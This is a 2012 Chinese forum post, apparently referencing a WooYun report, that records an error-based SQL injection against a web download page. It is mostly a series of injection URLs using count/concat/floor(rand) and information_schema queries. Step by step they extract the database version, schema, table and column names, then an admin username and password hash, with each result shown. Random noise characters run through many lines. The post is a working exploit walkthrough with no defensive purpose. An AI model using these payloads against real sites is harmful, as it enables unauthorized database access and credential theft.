http://www.wooyun.org/bugs/wooyun-2010-01666
3 N+ w* x5 o3 X3 ]3 R( I: A, i: ?/ c, ?3 I m: C |/ t, ?+ A
之前想找个测试 没想到这有 可以测试下做个记录而已
% {9 U2 S2 w5 k( R8 e$ I, V
3 Z2 n! F% p5 B$ N) n) p0 a- Phttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003! t9 p0 `/ a/ \ w* i3 v2 k' K" V* [
# J" a v: l/ ~# u: z& r+ q/data0/htdocs/leqi_new/app/myapp.php. t0 o) L; d0 n' l4 o/ _1 ]+ }
0 k1 B1 X, N$ d0 T
或者
" u! i5 V2 K4 I$ L7 O2 A' y1 r( d
5 e2 t7 E2 |4 j7 F, W6 v! ]/**********version()**********/ 5.1.49-log
4 P* G+ b" U1 Y! b! Z6 Bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003+ s8 L( X1 n% e: e
4 c ]6 p. I! h7 s U2 L/**********user()**********/
; T. _0 S+ q0 ~8 x+ ]( Vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
; D) s( g3 R3 N1 u- f0 D" t* Y& {6 n) w ^! {5 n% C4 N
/**********database()**********/ leqi1 j; _( p( h2 h8 w
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 M+ Q! y5 C. y. g2 Q
5 t. p1 E0 X9 k/**********limit依次递归爆库**********/8 v' @" h: [% X% l, J: L* J* b
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: c8 T4 M. q; xinformation_schema
: v/ J5 m3 W1 C4 Q \3 [* d7 m% ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( h! ?3 M% T9 @7 Nleqi
5 P- H" v% M: U Qhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* o! ^# l1 [# X; Y jtest, S' [+ l1 ?7 @
) t0 x4 u" J* K6 y" Q2 Q
/**********limit依次递归爆表名**********/$ j; Z7 S( ~! Z0 M. t+ b
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 a" |; F- L8 z
users8 ]5 h7 z! j% n$ F6 H1 b
) ?, X6 K8 H' s/**********limit依次递归爆字段名**********/* d: K. c. M2 d
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0039 g9 N8 d# c' P8 b7 T
user_id,username,nickname,passwd,group_id. ^" ^- M& b4 K0 |
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
3 @* M3 u1 r7 M3 `6 V/wapc/5000_0005_003
- F3 q& n' ~" v1 R t7 r$ v11 21
; e+ y( o5 k3 O2 l! T5 o7 S: I7 h7 Xhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% r# g7 x3 G! n) Y C( o3 t/wapc/5000_0005_003
3 a! D: j6 f- P, l/ q11 341 351 361( S3 h# C% a4 z3 r! j3 j
/**********爆数据**********/3 n6 j9 z k( K, y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% m% `2 O9 j8 R7 L) e4 q/ k0 O' Cadmin
z( S( ~' ~! ^6 u9 X) `http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
- t/ m* w: b% J! g5 f2 E- Q H d6a8b4574ca231eb8bd52764d4978ffcd( O$ v5 j2 o9 F
/ H& Z$ v! ^: v1 x A, c" q, _- I
* Z0 T9 C! i+ F/ { a+ E/ h |
发表于 2012-9-13 17:52:09
收藏
支持
反对